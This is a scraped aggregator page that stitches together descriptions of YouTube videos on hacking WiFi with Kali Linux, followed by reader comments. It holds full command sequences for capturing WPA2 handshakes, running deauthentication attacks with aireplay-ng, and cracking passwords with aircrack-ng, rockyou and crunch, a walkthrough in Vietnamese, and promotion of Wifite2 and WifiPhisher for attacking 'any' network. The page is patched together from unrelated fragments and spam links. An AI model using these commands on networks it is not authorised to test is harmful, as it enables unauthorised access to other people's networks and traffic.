Cracking WiFi WPA2 Handshake | ข่าวสารล่าสุดเกี่ยวกับ kali linux hack wifi

[button color=”primary” size=”medium” link=”#” icon=”” target=”false” nofollow=”false”]ดูเลย[/button]

I will own your WiFi with one Kali Linux command


Only one command is required to unlock a WiFi network! Be paranoid! Make sure you use strong passwords.
Need help? Join my Discord: https://discord.com/invite/usKSyzb

Menu:
Overview: 0:00
WiFi adapters: 0:19
Kali Linux setup: 0:50
Adapter Issues: 2:05
Connect Alfa Adapters to Kali Linux: 2:50
WiFi network to test: 4:15
Wifite overview: 4:49
Wifite options: 6:08
Test Wifite: 6:54
Kali Wordlist / Dictionary: 9:42
Success Wifite Test: 11:25
For the Win! 13:05

Wifite: https://github.com/derv82/wifite2
Alfa AWUS036NHA: https://amzn.to/3qbQGKN
Alfa AWUSO36NH: https://amzn.to/3moeQiI

================
Connect with me:
================
Discord: http://discord.davidbombal.com
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal

================
Support me:
================
Join thisisIT: https://bit.ly/thisisitccna
Or, buy my CCNA course and support me:
DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna
Udemy CCNA Course: https://bit.ly/ccnafor10dollars
GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10

======================
Special Offers:
======================
Cisco Press: Up to 50% discount
Save every day on Cisco Press learning products! Use discount code BOMBAL during checkout to save 35% on print books (plus free shipping in the U.S.), 45% on eBooks, and 50% on video courses and simulator software. Offer expires December 31, 2020. Shop now.
Link: bit.ly/ciscopress50

ITPro.TV:
https://itpro.tv/davidbombal
30% discount off all plans Code: DAVIDBOMBAL

Boson software: 15% discount
Link: bit.ly/boson15
Code: DBAF15P

wifi
kali
wifi
kali linux 2020
kali linux 2020.4
wifite
wpa
wep
wps
alfa
comptia
cech
oscp

Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

kalilinux wifi wifite

I will own your WiFi with one Kali Linux command

Automate WiFi Hacking with Wifite2 in Kali Linux [Tutorial]


Get Our Premium Ethical Hacking Bundle (90% Off): https://nulb.app/cwlshop

How to Automate WiFi Hacking with Wifite2 on Kali
Full Tutorial: http://bit.ly/Wifite2
Subscribe to Null Byte: https://goo.gl/J6wEnH
Kody’s Twitter: https://twitter.com/KodyKinzie

Kali Linux comes with an array of tools designed to scan and attack WiFi networks out of the box. We’ll show you how to automate this process with Wifite2 on this episode of Cyber Weapons Lab. If you don’t have Wifite2 installed, it’s easy enough to do so.

Wifite2 can target WPS, WPA, and WEP networks. And it uses many different tools to work its magic, such as Tshark, Pyrit, Cowpatty, and Aircrack. Attacks can use Reaver, Bully, WPSPixie, and more.

Recommended WiFi network adapter: https://www.amazon.com/dp/B004Y6MIXS/?tag=whtnb20

Follow Null Byte on:
Twitter: https://twitter.com/nullbytewht
Flipboard: https://flip.it/3.Gf_0
Weekly newsletter: https://eepurl.com/dE3Ovb

Automate WiFi Hacking with Wifite2 in Kali Linux [Tutorial]

Thực hành Crack WIFI trên Kali Linux


Tài liệu đầy đủ: https://goo.gl/U7BJ9V

Sử dụng Aircrackng để crack mật khẩu Wifi (WPA/WPA2)
Bước 1: Mở Terminal để thực hiện các câu lệnh (tương tự Command Prompt
trong Windows)
• Bước 2: Kiểm tra tên card Wireless đang sử dụng bằng lệnh iwconfig, thông
thường là card wlan0. Nếu card wireless chưa được bật (không thể kết nối wifi)
thì có thể bật bằng lệnh ifconfig wlan0 up
• Bước 3: Chuyển card mạng Wifi sang chế độ monitor (chế độ theo dõi toàn bộ
các tín hiệu trong mạng) bằng airmonng.
Kiểm tra tên card Wifi với lệnh iwconfig hay airmonng, thông thường là wlan0.
Chuyển card wlan0 sang chế độ monitor bằng công cụ airmon với lệnh:
airmonng start wlan0
Lúc này, kiểm tra bằng ifconfig ta sẽ thấy có card wlan0mon
• Bước 4: Sử dụng airodump để theo dõi hoạt động các mạng wifi hiện tại qua
card wlan0mon (card wlan0 ở chế độ monitor)
airodumpng wlan0mon
• Bước 5: Xác định mạng wifi mục tiêu và sử dụng airodump để bắt gói tin và chỉ
theo dõi duy nhất mạng mục tiêu đó:
airodumpng c [channel] w [tập tin] bssid [BSSID của mạng] wlan0mon
Ví dụ: airodumpng c 9 w wifisniff bssid C4:6E:1F:F6:34:B8 wlan0mon
Trong đó:
+ Quan sát trường CH để xác định Channel của điểm phát sóng
+ w [tập tin]: xác định đường dẫn để lưu tập tin bắt được (định dạng .cap)
+ bssid: Xem trường BSSID (địa chỉ MAC của access point)
• Bước 6: Thu thập gói tin bắt tay WPA handshake (bắt tay 4 bước) trong quá trình
đăng nhập để dựa vào đó dò tìm mật khẩu.
Có 2 cách:
+ Chờ người dùng nào đó đăng nhập vào Wifi đang theo dõi.
+ Sử dụng aireplay để tạo tín hiệu deauth (kích các người dùng đang sử dụng mạng
thoát ra và đăng nhập lại liên tục. Cú pháp:
aireplayng deauth [số lệnh deauth] a [BSSID của mạng] wlan0mon
Ví dụ: aireplayng deauth 5 a C4:6E:1F:2D:D6:B8 wlan0mon (có thể thay –deauth thành
0, khi muốn gửi không giới hạn lệnh deauth có thể đặt thông số là 0)
• Bước 7: Thực hiện chờ hoặc dùng aireplay như bước 6 đến khi nhận được gói
tin WPA handshake của mạng mục tiêu tương ứng, ta dừng quá trình bắt gói tin
(Ctrl+C) và tiến hành dò tìm mật khẩu dựa vào file .cap đã bắt được.
Có thể sử dụng phương pháp dò tìm theo Wordlist hay thực hiện Bruteforce để dò
tìm mật khẩu.
Phương pháp dùng Wordlist (danh sách các từ có sẵn)
Trong Kali cung cấp sẵn một số Wordlist thông dụng tại thư mục /usr/share/wordlist. Nổi
bật là wordlist rockyou.txt với thư viện khoảng 10 triệu mật khẩu thông dụng. Ngoài ra, có
thể dùng Crunch để tự tạo Wordlist tùy ý.
Nếu sử dụng Wordlist rockyou.txt có sẵn, ta thực hiện các lệnh sau:
cp /usr/share/wordlists/rockyou.txt.gz /root/Desktop  Copy file nén chứa
rockyou.txt ra Desktop để thuận tiện sử dụng
gzip –d /root/Desktop/rockyou.txt.gz  Giải nén file rockyou.txt.gz
Sau khi đã có file rockyou.txt đã giải nén, sử dụng lệnh sau để dò tìm password:
aircrackng w [đường dẫn file Wordlist] [đường dẫn file .cap đã thiết lập ở bước 5] Ví dụ: aircrackng –w /root/Desktop/rockyou.txt wifisniff01.cap
Phương pháp kết hợp tool Crunch để bruteforce (dò tìm vét cạn) không cần
dùng Wordlist có sẵn
Cú pháp để sử dụng Crunch:
crunch [min] [max] [charset] t [pattern] o [path file] với:
 [min]: số kí tự tối thiểu
 [max]: số kí tự tối đa
 [charset]: danh sách kí tự có trong mật khẩu
 [pattern]: mẫu mật khẩu & các ký tự đã biết, ký tự chưa biết ký hiệu %
 [path file]: đừng dẫn file Wordlist được tạo
Thực hiện lệnh với cú pháp như sau:
crunch [min] [max] [danh sách các ký tự có có trong chuỗi] –t [mẫu định dạng mật
khẩu] | aircrackng w [tập tin đã capture.cap] –bssid [địa chỉ MAC của mục tiêu] Ví dụ: Dự đoán mật khẩu có 10 ký tự là 1 số điện thoại có đầu số 091, mật khẩu gồm
các số từ 09 có thể dò tìm vét cạn tất cả các dãy 091xxxxxxx như sau:
crunch 10 10 0123456789 –t 091%%%%%%% | aircrackng –w wifisniff.cap –bssid
C4:6E:1F:2D:D6:B8
Bước 8: Sau khi đã tìm được mật khẩu, tắt chế độ monitor của card wlan0 để có
thể sử dụng lại Wifi bằng lệnh
airmonng stop wlan0mon
Dùng mật khẩu vừa dò tim để truy cập thử Wifi

See also  คำศัพท์ ผัก ภาษาอังกฤษ Vegetables | ข้าวโพด คลุก เนย ภาษา อังกฤษ
See also  How UPS Is Using Big Data To Transform Package Deliveries | NetNet | CNBC | บริษัท ups เบอร์ติดต่อ

Thực hành Crack WIFI trên Kali Linux

Cracking WiFi WPA2 Handshake


Full process using Kali Linux to crack WiFi passwords. I discuss network adapters, airmonng, airodumpng, aircrackng and more in this video.

Menu:
Use airmonng to crack WiFi networks: 0:00
Network Adapter to use: 0:46
Kali Linux setup: 1:20
Plug in network adapter: 1:35
Verify that network adapter is recognized by Kali Linux: 2:04
WPA2 network to crack: 2:43
iwconfig: 3:27
Kali Version: 3:34
Kill conflicting processes with airmonng: 3:55
Put interface into monitor mode: 4:32
Discover WiFi Networks with airodumpng: 5:15
Use airodumpng to view only one network: 6:20
Connect to network using an iPhone: 6:39
airodumpng capture WPA2 four way handshake: 6:58
Use aireplayng to deauthenticate clients: 7:25
WPA2 four way handshake captured: 8:08
Use Wireshark to view WPA2 four way handshake: 8:38
Put interface back into managed mode: 9:30
Crack WPA2 password with aircrackng: 10:10
Password cracked: 11:00
WiFi router WPA2 settings: 12:00
Summary: 12:40

================
Network Adapters:
================
Alfa AWUS036NHA: https://amzn.to/3qbQGKN
Alfa AWUSO36NH: https://amzn.to/3moeQiI

================
Commands used:
================
! See version of Kali
cat /etc/osrelease
uname a

! See interfaces
ip addr
iwconfig

!kill processes
sudo airmonng check kill

!Start monitor mode
sudo airmonng start wlan0

!Verify that monitor mode is used
sudo airmonng

!You could also use iwconfig to check that interface is in monitor mode:
iwconfig

! Get the AP’s MAC address and channel
sudo airodumpng wlan0mon

! APMAC & channel you need to select your own here:
ESSID: 90:9A:4A:B8:F3:FB
Channel used by AP for SSID: 2

!1st Window:
!Make sure you replace the channel number and bssid with your own
!Replace hack1 with your file name like capture1 or something
sudo airodumpng w hack1 c 2 bssid 90:9A:4A:B8:F3:FB wlan0mon

!2nd Window deauth attack
!Make sure you replace the bssid with your own
sudo aireplayng deauth 0 a 90:9A:4A:B8:F3:FB wlan0mon

!Use Wireshark to open hack file
wireshark hack101.cap
!Filter Wireshark messages for EAPOL
eapol

!Stop monitor mode
airmonng stop wlan0mon

!Crack file with Rock you or another wordlist
!Make sure you have rockyou in text format (unzip file on Kali)
!Replace hack101.cap with your file name
aircrackng hack101.cap w /usr/share/wordlists/rockyou.txt

================
Previous videos:
================
Kali Installation: https://youtu.be/VAMP8DqSDjg
WPA2 GPU password cracking: https://youtu.be/J8A8rKFZWM
Wordlists (rockyou): https://youtu.be/rgWcguAgXA

================
Connect with me:
================
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal

================
Support me:
================
Buy my CCNA course and support me:
DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna
Udemy CCNA Course: https://bit.ly/ccnafor10dollars
GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10

======================
Special Offers:
======================
Boson software: 15% discount
Link: bit.ly/boson15
Code: DBAF15P

wifi
kali linux
kali linux 2020
kali linux 2020.4
wifite
wpa
wep
wps
alfa
comptia
ceh
oscp
wifi
airmonng
aircrackng
hack
hacker
hacking
ethical hacking
kali
ine

Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

wifi wpa2 kalilinux

Cracking WiFi WPA2 Handshake

How to Hack WiFi | Kali Linux | 100% Working | 2021


This is a How to Tutorial Video, How to Hack Wifi using WifiPhisher, Wireless Phishing Attack, Hack any WPA, WPA2, WPE Networks with this Fastest Way.
There are many other tools for wifi hacking but this is the one of the best and userfriendly UI. To Perform this Attack You will need a USB WiFi Adapter which Supports Packet Injection.
____________________________________
My USB WiFi Adapter ▶︎ https://tinyurl.com/pau06
____________________________________
Download WiFiPhisher 🔻
GitHub ▶︎ https://github.com/wifiphisher/wifiphisher
____________________________________
▶️ Watch this Video
● How to Install Kali Linux 🔻
https://www.youtube.com/watch?v=jGhSavSrmEc
____________________________________
TimeStamps 🔻
0:00 | Intro Hack with Spidy
0:45 | Download WifiPhisher
1:15 | Performing WifiPhisher Attack
____________________________________
🔰 Instagram : http://instagram.com/hackwithspidy
____________________________________
DISCLAIMER !
This Channel DOES NOT Promote or Encourage Any illegal activities, all contents provided by this Channel s Meant for EDUCATIONAL PURPOSE only.
____________________________________
Thank You for Watching ! Give it a Thumbs up 👍🏻 if you liked the video & Drop your Comments down below.

See also  แจกสูตร 3 เทคนิค ขายอาหารออนไลน์ให้ปัง ขายของกินออนไลน์ 2020 ขายดี | ทําของขายออนไลน์

Don’t forget to Subscribe so you don’t miss any of my Upcoming Videos !
____________________________________
hackwithspidywifihackingwifiphisherkalilinux

How to Hack WiFi | Kali Linux | 100% Working | 2021

How to Crack Wifi Using Aircrack ng in Kali Linux 2020.2


BUY ME COFFEE PAYPAL: [email protected]

(Disclaimer: This video content is intended for educational and informational purposes only) it is not meant for causing
any dangerous harm to any one youtubeteam kali hacking cracker newtechnology techblogger techies techgadgets artificialintelligence technologythesedays technews techlover technologyrocks techtrends
interview pythonprogramming dataanalysis career business education tech technology automation innovation datascience machinelearning artificialintelligence deeplearning programming mathematics algorithm datascientist bigdata neuralnetworks

How to Crack Wifi Using Aircrack ng in Kali Linux 2020.2

29. WIFI Hacking: How To Hack A WIFI Using Wifite How To Hack A WIFI With Kali Linux


ONLY FOR EDUCATIONAL PURPOSES

In this video, we are going to use a tool called wifite to hack any wifi we want. Wifite works against all kind of encryption standards and its a fully automated tool unlike reaver and pretty easy to use.

Please subscribe our channel. We will upload a new video everyday and also post your suggestions in the comments section.
Join our facebook group for updates regarding other courses and whats coming next!
https://www.facebook.com/groups/ITConsultants/

29. WIFI Hacking: How To Hack A WIFI Using Wifite How To Hack A WIFI With Kali Linux

WiFi Password Hack With Using Kali Linux


DISCLAIMER: This is for Educational purpose only do not use it for any illegal mean.

Best and less time consuming way, made only for Educational Purpose
This channel is about all technical knowledge.

Support me and Subscribe My Channel For Encourage me to upload other many Technical videos.

WiFi Password Hack With Using Kali Linux

kali linux 2021.2 WPS wifi vulnerability .


 tools Used in this video :
reaver
airodmpng

NOTE:
this video is not a tutorial, it’s just me showing you how easy to get the WPS, so you need to disable it .
to understand what i’m doing, you must have some knowledge about the kali tools and commands and Networking.

Incase you wanna change your MAC address :
sudo ifconfig [interface] down
sudo macc A for random macc address
sudo ifconfig [interface] up

this video i educational and i’m using my own WIFI to practice .
here is a good reason why you must disable your wps option while you use your wifi. hacker can still crack your wifi password even after you change the password if they get your WPS.

happy_hunting

kali linux 2021.2 WPS  wifi vulnerability .

1 Cài đặt công cụ hack wifi WPA2 Kali Linux


Xem ở trình duyệt chrome để có chất lượng tốt nhất

1 Cài đặt công cụ hack wifi WPA2  Kali Linux .

สำหรับข้อมูลเพิ่มเติมเกี่ยวกับ kali linux hack wifi หรือข่าวที่เกี่ยวข้องอื่นๆ โปรดไปที่: เรา การกระทำ

Cracking WiFi WPA2 Handshake และรูปภาพที่เกี่ยวข้องkali linux hack wifi

Cracking WiFi WPA2 Handshake
Cracking WiFi WPA2 Handshake

kali linux hack wifi และข้อมูลที่เกี่ยวข้อง

>>> สามารถหาข้อมูลที่น่าสนใจอื่นๆ ได้ที่นี่ https://giaoductieuhoc.vn/
แบ่งปันที่นี่

#Cracking #WiFi #WPA2 #Handshake.

wifi,wpa2,wpa,hacking,kali linux,kali,linux,wifite,wifite kali linux,kali linux tutorial,kali linux install,kali linux hacking tutorials playlist,kali linux basics,kali linux tutorial for beginners,kali linux 2020,kali linux hacking tutorials,ethical hacking,ethical hacking tutorial,ethical hacking course,linux tutorial,ceh,oscp,hacker,brute force attack,airmon,airmon windows,airmon-ng,aircrack ng windows,wifi cracking github,wifey,wpa handshake,aircrack.

Cracking WiFi WPA2 Handshake.

kali linux hack wifi.

เราหวังว่าคุณจะพบข้อมูลเกี่ยวกับ kali linux hack wifi ที่นี่
ขอบคุณที่รับชมเนื้อหานี้

38 thoughts on “Cracking WiFi WPA2 Handshake | ข่าวสารล่าสุดเกี่ยวกับ kali linux hack wifi”

 1. Menu:
  Use airmon-ng to crack WiFi networks: 0:00
  Network Adapter to use: 0:46
  Kali Linux setup: 1:20
  Plug in network adapter: 1:35
  Verify that network adapter is recognized by Kali Linux: 2:04
  WPA2 network to crack: 2:43
  iwconfig: 3:27
  Kali Version: 3:34
  Kill conflicting processes with airmon-ng: 3:55
  Put interface into monitor mode: 4:32
  Discover WiFi Networks with airodump-ng: 5:15
  Use airodump-ng to view only one network: 6:20
  Connect to network using an iPhone: 6:39
  airodump-ng capture WPA2 four way handshake: 6:58
  Use aireplay-ng to deauthenticate clients: 7:25
  WPA2 four way handshake captured: 8:08
  Use Wireshark to view WPA2 four way handshake: 8:38
  Put interface back into managed mode: 9:30
  Crack WPA2 password with aircrack-ng: 10:10
  Password cracked: 11:00
  WiFi router WPA2 settings: 12:00
  Summary: 12:40

  ================
  Network Adapters:
  ================
  Alfa AWUS036NHA: https://amzn.to/3qbQGKN
  Alfa AWUSO36NH: https://amzn.to/3moeQiI

  ================
  Commands used:
  ================
  ! See version of Kali
  cat /etc/os-release
  uname -a

  ! See interfaces
  ip addr
  iwconfig

  !kill processes
  sudo airmon-ng check kill

  !Start monitor mode
  sudo airmon-ng start wlan0

  !Verify that monitor mode is used
  sudo airmon-ng

  !You could also use iwconfig to check that interface is in monitor mode:
  iwconfig

  ! Get the AP's MAC address and channel
  sudo airodump-ng wlan0mon

  ! AP-MAC & channel – you need to select your own here:
  ESSID: 90:9A:4A:B8:F3:FB
  Channel used by AP for SSID: 2

  !1st Window:
  !Make sure you replace the channel number and bssid with your own
  !Replace hack1 with your file name like capture1 or something
  sudo airodump-ng -w hack1 -c 2 –bssid 90:9A:4A:B8:F3:FB wlan0mon

  !2nd Window – deauth attack
  !Make sure you replace the bssid with your own
  sudo aireplay-ng –deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon

  !Use Wireshark to open hack file
  wireshark hack1-01.cap
  !Filter Wireshark messages for EAPOL
  eapol

  !Stop monitor mode
  airmon-ng stop wlan0mon

  !Crack file with Rock you or another wordlist
  !Make sure you have rockyou in text format (unzip file on Kali)
  !Replace hack1-01.cap with your file name
  aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt

  ================
  Previous videos:
  ================
  Kali Installation: https://youtu.be/VAMP8DqSDjg
  WPA2 GPU password cracking: https://youtu.be/J8A8rKFZW-M
  Wordlists (rockyou): https://youtu.be/rgWcguAg-XA

  ================
  Connect with me:
  ================
  Discord: https://discord.com/invite/usKSyzb
  Twitter: https://www.twitter.com/davidbombal
  Instagram: https://www.instagram.com/davidbombal
  LinkedIn: https://www.linkedin.com/in/davidbombal
  Facebook: https://www.facebook.com/davidbombal.co
  TikTok: http://tiktok.com/@davidbombal
  YouTube: https://www.youtube.com/davidbombal

  ================
  Support me:
  ================
  Buy my CCNA course and support me:
  DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna
  Udemy CCNA Course: https://bit.ly/ccnafor10dollars
  GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10

  ======================
  Special Offers:
  ======================
  Boson software: 15% discount
  Link: bit.ly/boson15
  Code: DBAF15P

  Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

  Reply
 2. Ive a question, the rockyou file didn't find the pass, and this is the problem I've been running around, the modem have a 8 characters random numbers and letters it's not actually a word or a phrase, so when you do the aircrack how can I make sure the list select each number and each letter ? Is there another mode to crack it ?

  Reply
 3. Question for anyone running into this problem, so my wireless receiver in working but whenever I want to try to put it in monitor mode it says I have to kill the processes as he said, but whenever I kill the processeses that removes my network

  Reply
 4. Good day David!
  I'm trying to follow the tutorial and when I get to the step in which you scan the networks my wifi adapter (alfa awus36nh) doesn't see anything. I tried with Parrot OS and I can follow but I can't do anything in Kali.
  My wifi network (when I plug my adapter in) it says it's down when I use "ip a" and in the network icon in the right upper corner says that the device is not managed. Any thoughts on how can I solve this? Thanks in advice!

  My system info:
  Linux kali 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12) x86_64 GNU/Linux
  Using: VMware® Workstation 15 Pro

  Reply
 5. hi david greetings from Indonesia. may i request a full glossary file from you please provide download link here if you are kind to me. Thank you very much

  Reply
 6. His moderators are such losers I got banned from the server because I needed help the kid changed my name because he said it was inappropriate then I tried to send photos to the chat because I needed help and the dude who was helping me doesn’t read his private messaging. And the moderator blocked my photo saying your photo was blurry any way and I tried to speak to the dude that was helping and the other dude banned me so if you join the server on discord his name is taco if he replies to u don’t answer him

  Reply
 7. After stopping the monitor mode don't forget to start the NetworkManager …type;
  sudo systemctl start NetworkManager
  To be able to reconnect to WiFi

  Reply
 8. When i do sudo airmon-ng start wlan0 , it goes on monitor mode but the interface name doesnt change to wlan0mon. Its still wlan0. What do i do?

  Reply
 9. Good day. I have captured 4way handshake. I used rockyou.txt to get my forgotten password but after 8 hours it said "no password found". Please could you help me if I sent you the pcap file?

  Reply
 10. @David Bombal I got to the part where you plug in the wifi adapter, but Kali doesnt seem to recognise it. I have set the network to Bridged and I have connected it to the vm and also set it as the default for the host. What am I doing wrong?

  Reply

Leave a Comment